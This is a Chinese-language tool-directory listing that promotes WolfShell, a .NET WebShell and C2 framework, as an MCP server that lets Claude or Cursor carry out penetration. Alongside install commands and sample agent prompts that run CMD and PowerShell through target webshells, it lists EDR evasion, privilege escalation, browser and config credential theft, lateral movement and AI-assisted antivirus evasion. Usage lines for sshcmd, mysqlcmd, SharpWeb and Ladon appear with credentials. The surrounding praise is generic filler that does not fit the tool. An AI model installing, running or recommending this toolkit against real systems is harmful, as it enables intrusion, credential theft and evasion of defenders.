幽狼AI Shell
幽狼AI Shell 是 AI Skill Hub 本期精选MCP工具之一。综合评分 8.0 分,整体质量较高。我们强烈推荐将其纳入你的 AI 工具库,帮助提升工作效率。
📚 深度解析
通过安装 幽狼AI Shell,你的 AI 助手将获得额外的工具调用能力,可以用自然语言直接操控该工具的功能,无需学习复杂的命令行语法。MCP 工具的核心价值在于"一次配置,永久增强"——配置完成后,每次与 AI 对话时都可以无缝调用这些工具。
在技术实现上,MCP 工具通过标准的 JSON-RPC 协议与 AI 客户端通信,工具的功能以"工具列表"的形式暴露给 AI 模型,AI 可以按需调用。幽狼AI Shell 提供了结构化的工具调用接口,使 AI 模型能够精确地理解和使用每个功能点,显著降低 AI 在工具使用上的错误率。
与传统的 API 集成相比,MCP 工具的优势在于无需编写代码——用户只需在配置文件中添加几行 JSON,即可让 AI 获得全新能力。AI Skill Hub 将 幽狼AI Shell 评为 AI 评分 8.0 分,属于同类工具中的优质选择。
📋 工具概览
支持AI渗透的高级WebShell & C2管理工具
幽狼AI Shell 是一款遵循 MCP(Model Context Protocol)标准协议的 AI 工具扩展。通过 MCP 协议,它可以让 Claude、Cursor 等主流 AI 客户端直接访问和操作外部工具、数据源和服务,实现 AI 能力的无缝扩展。无论是文件操作、数据库查询还是 API 调用,都可以通过自然语言在 AI 对话中直接触发,极大提升生产效率。
📖 中文文档
支持AI渗透的高级WebShell & C2管理工具
幽狼AI Shell 是一款遵循 MCP(Model Context Protocol)标准协议的 AI 工具扩展。通过 MCP 协议,它可以让 Claude、Cursor 等主流 AI 客户端直接访问和操作外部工具、数据源和服务,实现 AI 能力的无缝扩展。无论是文件操作、数据库查询还是 API 调用,都可以通过自然语言在 AI 对话中直接触发,极大提升生产效率。
- 通过标准 MCP 协议与 Claude、Cursor 等主流 AI 客户端深度集成
- 提供结构化工具调用接口,显著降低 AI 集成复杂度
- 支持 Claude Desktop 和 Claude Code 无缝接入,开箱即用
- 可与其他 MCP 工具组合叠加,构建完整 AI 工作站
- 轻量无侵入设计,不影响现有系统架构
- 在 Claude Desktop 对话中直接调用本地工具,实现 AI 与系统的深度联动
- 通过自然语言驱动复杂的多步骤自动化任务,代替繁琐手动操作
- 将多个 MCP 工具组合使用,构建个人专属 AI 工作站
# 方式一:通过 Claude Code CLI 一键安装
claude skill install https://github.com/0x7556/wolfshell
# 方式二:手动配置 claude_desktop_config.json
{
"mcpServers": {
"--ai-shell": {
"command": "npx",
"args": ["-y", "wolfshell"]
}
}
}
# 配置文件位置
# macOS: ~/Library/Application Support/Claude/claude_desktop_config.json
# Windows: %APPDATA%/Claude/claude_desktop_config.json
- 确认已安装 Node.js(v18 或以上版本)
- 打开 Claude Desktop 或 Claude Code 的 MCP 配置文件
- 按「交给 Agent 安装 → Claude Desktop」标签中的 JSON 配置填入 mcpServers 字段
- 保存配置文件并重启 Claude 客户端
- 重启后,在对话中即可使用本工具
# 安装后在 Claude 对话中直接使用 # 示例: 用户: 请帮我用 幽狼AI Shell 执行以下任务... Claude: [自动调用 幽狼AI Shell MCP 工具处理请求] # 查看可用工具列表 # 在 Claude 中输入:"列出所有可用的 MCP 工具"
// claude_desktop_config.json 配置示例
{
"mcpServers": {
"__ai_shell": {
"command": "npx",
"args": ["-y", "wolfshell"],
"env": {
// "API_KEY": "your-api-key-here"
}
}
}
}
// 保存后重启 Claude Desktop 生效
简介
WolfShell:首款支持AI渗透的高级WebShell & C2管理工具
WolfShell(幽狼)是一款为微软 .NET/ASPX 环境打造的高级 WebShell 与 C2 管理工具,面向安全研究与渗透测试(红队)使用,提供强大的命令执行、提权与内网穿透能力;内置大量渗透工具并集成 AI 智能渗透 辅助,支持内存加载、无文件落地操作,从而实现高隐蔽性的内网渗透与灵活扩展。
🔥 功能特性
- Shell:支持ASPX、ASHX、ASMX、内存马、EXE、PowerShell、DLL、MSbuild、ysoserial反序列化等9种类型)。
- 正向马:支持个人机植入正向后门级联控制整个内网,EXE、PS1、DLL、MSbuild等,支持IIS端口复用。
- 内存马:ASPX一键注入内存马,任意路径访问,每次都可修改shell地址连接,干扰蓝队分析。
- Cmd命令执行: 在目标系统上直接执行任意 CMD 命令。魔改whoami防止被EDR记录并报警。
- 文件管理: 在目标系统上枚举目录文件、新建文件、文件上传、EXE执行、重命令、删除、设置文件时间等。
- PowerShell执行: 支持执行 PowerShell 代码和命令。魔改whoami防止被EDR记录并报警。
- Shellcode执行: 可在目标环境内直接执行原生的 Shellcode,一键上线Cobalt Strike、Metasploit。
- .NET程序执行: 支持内存加载执行自定义.NET程序集,快速扩展后渗透能力。
- 内存加载扫描器: 只需研发单个IP的.NET程序,通过该模块即可变成内存加载的C段扫描器。
- C#代码执行: 支持动态加载与执行 C# 代码,复制案例代码,给AI修改快速扩充战力。
- ValidationKey:提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息。
- web.config读取:提取数据库连接信息(数据库名、用户、密码)、SMTP/邮件服务器用户密码等。
- 端口转发: 实现本地端口到远程内网主机的映射,方便安全地访问内部网络服务。
- HTTP代理: 一键内存注入Suo5高性能 HTTP 隧道代理工具。
- EfsPotato: 利用系统服务漏洞进行权限提升。
- BadPotato: 利用系统服务漏洞进行权限提升。
- 内网级联Cmd命令执行: 支持级联内网第2层 WebShell 执行 CMD 命令进行横向移动。
- 内网级联PowerShell执行: 支持级联内网第2层 WebShell 执行 PowerShell 命令进行横向移动。
- SshCmd:SSH 远程命令执行工具,支持对内网主机的命令执行、文件上传下载实现横向移动。
- MysqlCmd:MySQL 数据库连接工具,支持连接内网MySQL,执行查询、导入导出等数据库操作。
- MssqlCmd:SQL Server数据库连接工具,支持连接内网数据库,执行查询、导入导出、横向移动、命令执行、Potato提权等。
- SharpWeb:浏览器凭据抓取工具,支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据。
- 密码读取: IISpwd wifipwd FileZillaPwd firefoxpwd XshellPwd GetPwd FirefoxHistory FirefoxCookie
- 漏洞检测:MS17010 SMBGhost HikvisionPoc ActivemqPoc Struts2Poc WeblogicPoc CVE-2022-36537 CVE-2024-47176 CVE-2022-27925 CVE-2024-27956
- 横向工具:wshell SmbExec WmiExec WmiExec2 AtExec MssqlCmd MmcExec ShellExec ShellBrowserExec
- AI免杀:接入AI人工智能,聊个天就能免杀WebShell。
- Ladon:内网渗透工具集,内存加载无文件落地,包含端口扫描、资产探测、密码审计、漏洞检测、漏洞利用、横向移动等。(工具在集成中,目前已完成10多种协议资产探测,其它模块暂未支持,和potato一样,无法集成所有工具,有些功能可能得使用原程序)
- AddUser: 绕过杀软EDR\XDR添加系统用户、管理员、域用户、域管理员工具。
- NoPowerShell:禁用或没有PowerShell执行PowerShell命令、代码、文件功能。
辅助功能
安装与使用
1. 下载WolfShell
git clone https://github.com/0x7556/wolfshell.git2. 目标环境 - 确保目标环境支持ASPX、ASHX、ASMX等脚本 - .NET >= 3.5,Windows 7-Windows 2026
3. 上传WolfShell - 将WolfShell文件上传到目标服务器,客户端支持生成ASPX、ASHX、内存马等9种类型。 - WebShell脚本: https://github.com/0x7556/wolfshell/tree/main/shell
4. 访问WebShell - 通过工具客户端连接WebShell,默认密码 WolfShell,修改密码可使用工具上的WolfHash加密。
编译EXE程序正向马C2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:wolf.exe wolf.cs使用环境
功能示例
启动AI智能服务器API
点击幽狼Shell工具标签“AI->MCP”,找到按钮“API MCP Server” 
1. AI渗透 通过幽狼 Shell 执行 CMD 命令(使用 Shell 地址和密码)
配合相关漏洞让AI自动获取shell,以成功执行命令为验收标准,防止AI幻觉或检测200状态误报为成功GetShell。 示例提示词:
- 使用幽狼 http://192.168.50.106/shell.aspx Wolf8888 执行 CMD 命令: whoami
- 使用幽狼 http://192.168.1.11/wolf.aspx WolfShell 执行 CMD 命令:查看系统信息
3. AI渗透 通过幽狼 Shell 执行 PowerShell 命令(使用 Shell 地址和密码)
配合相关漏洞让AI自动获取shell,以成功执行命令为验收标准,防止AI幻觉或检测200状态误报为成功GetShell。 示例提示词: - 使用幽狼 http://192.168.1.11/wolf.aspx WolfShell 执行 PowerShell 命令:whoami - 使用幽狼 http://192.168.1.11/wolf.aspx WolfShell 执行 PowerShell 命令:查看系统信息
5. AI渗透 幽狼 WolfShell 视频演示
https://github.com/0x7556/hackvideo/blob/main/Wolf%20AI%20Shell.mov
Potato提权示例
efspotato提权
badpotato提权
内网扫描示例
端口转发示例
HTTP代理示例
SSH远程命令执行示例
Usage:
sshcmd 192.168.50.128 22 root toor id
sshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rar
Keybord
sshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rar
Mysql数据库连接示例
mysqlcmd host port user pass dbname sqlstr
mysqlcmd host port user pass dbname sqlb64
Demo:
mysqlcmd 192.168.50.139 3306 root WolfShell mysql info
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT VERSION(); ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT 3+5 ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ==";
读取浏览器密码示例
- SharpWeb:浏览器凭据抓取工具,支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据。
```bash Usage: SharWeb arg0 [arg1 arg2 ...]
Arguments: all - Retrieve all Chrome, FireFox and IE/Edge credentials. full - The same as 'all' chrome - Fetch saved Chrome logins. e.g. -d Directory firefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directory edge - Fetch saved Internet Explorer/Microsoft Edge logins.
Demo: SharWeb all SharWeb chrome SharWeb chrome -d C:\Output SharWeb firefox -p mymasterkey -d C:\Output
Ladon内网渗透工具示例
20251106 主要集成以下探测功能,其它功能暂未支持
Usage:
Ladon whoami
Ladon 192.168.50.159/24 ICMP ICMP存活主机探测
Ladon 192.168.50.159/24 PortScan 开放端口服务扫描
Ladon 192.168.50.159/24 WebScan 网站标题、中间件
Ladon 192.168.50.159/24 SmbInfo SMB存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 NbtInfo NBT存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 WmiInfo WMI存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 LdapInfo LDAP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 RdpInfo RDP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 SmtpInfo SMTP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 HttpInfo HTTP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 WinrmInfo Winrm存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 MssqlInfo SQL数据库主机探测、NTLM系统信息
Ladon 192.168.50.159/24 FtpInfo FTP存活主机探测
Ladon 192.168.50.159/24 T3Info Weblogic协议探测
Ladon 192.168.50.159/24 CiscoInfo Cisco路由器探测
Ladon 192.168.50.159/24 SnmpInfo SNMP设备探测,如路由器、交换机等
Ladon 192.168.50.159/24 OxidInfo Windows多网卡主机探测
Ladon 192.168.50.159/24 EthInfo Windows多网卡主机探测
Ladon http://0x7556.org WPinfo WordPress版本、插件探测、漏洞
Ladon 192.168.50.159/24 DnsInfo DNS存活主机探测、域名识别
#### SMB协议NTLM信息OS操作系统识别 
#### WebScan 网站标题、中间件扫描 
端口扫描 示例
PortScan 192.168.50.159
PortScan 192.168.50.159 80,22,135,445
EXP本地使用
本机使用 Hacking 里的工具EXP,运行HackTest.exe后,添加Shell: http://127.0.0.1:8080/wolfshell 右键---Hacking后渗透工具集---点击对应工具EXP,就出现工具用法,文本框输入命令执行
2. AI渗透 通过幽狼客户端预配置的 ID 执行 CMD 命令
优点不会向AI泄露目标Shell和密码 示例提示词: - 使用幽狼 ID 为 9 的 Shell 执行 CMD 命令:查看当前用户
4. AI渗透 通过幽狼客户端预配置的 ID 执行 PowerShell 命令
优点不会向AI泄露目标Shell和密码 示例提示词: - 使用幽狼 ID 为 9 的 Shell 执行 PowerShell 命令:ipconfig - 使用幽狼 ID 为 9 的 Shell 执行 PowerShell 命令:查看当前 IP
高级WebShell和C2管理工具,支持AI渗透
⚡ 核心功能
- 通过标准 MCP 协议与 Claude、Cursor 等主流 AI 客户端深度集成
- 提供结构化工具调用接口,显著降低 AI 集成复杂度
- 支持 Claude Desktop 和 Claude Code 无缝接入,开箱即用
- 可与其他 MCP 工具组合叠加,构建完整 AI 工作站
- 轻量无侵入设计,不影响现有系统架构
👥 适合人群
🎯 使用场景
- 在 Claude Desktop 对话中直接调用本地工具,实现 AI 与系统的深度联动
- 通过自然语言驱动复杂的多步骤自动化任务,代替繁琐手动操作
- 将多个 MCP 工具组合使用,构建个人专属 AI 工作站
⚖️ 优点与不足
- +MIT 协议,可免费商用
- +标准化 MCP 协议,生态互联性强
- +与 Claude 官方生态无缝对接
- +即插即用,配置简单快捷
- −依赖 Claude 客户端,非 Claude 用户无法使用
- −MCP 协议仍在持续演进,接口可能变更
- −需要一定的配置步骤
AI Skill Hub 为第三方内容聚合平台,本页面信息基于公开数据整理,不对工具功能和质量作任何法律背书。
建议在沙箱或测试环境中充分验证后,再部署至生产环境,并做好必要的安全评估。
✅ MIT 协议 — 最宽松的开源协议之一,可自由商用、修改、分发,仅需保留版权声明。
❓ 常见问题 FAQ
经综合评估,幽狼AI Shell 在MCP工具赛道中表现稳健,质量优秀。如果你已有明确的使用需求,可以直接上手体验;如果还在评估阶段,建议对比同类工具后再做决策。
| 原始名称 | wolfshell |
| Topics | mcpasp.netwebshell |
| GitHub | https://github.com/0x7556/wolfshell |
| License | MIT |
| 语言 | ASP.NET |
收录时间:2026-06-28 · 更新时间:2026-06-28 · License:MIT · AI Skill Hub 不对第三方内容的准确性作法律背书。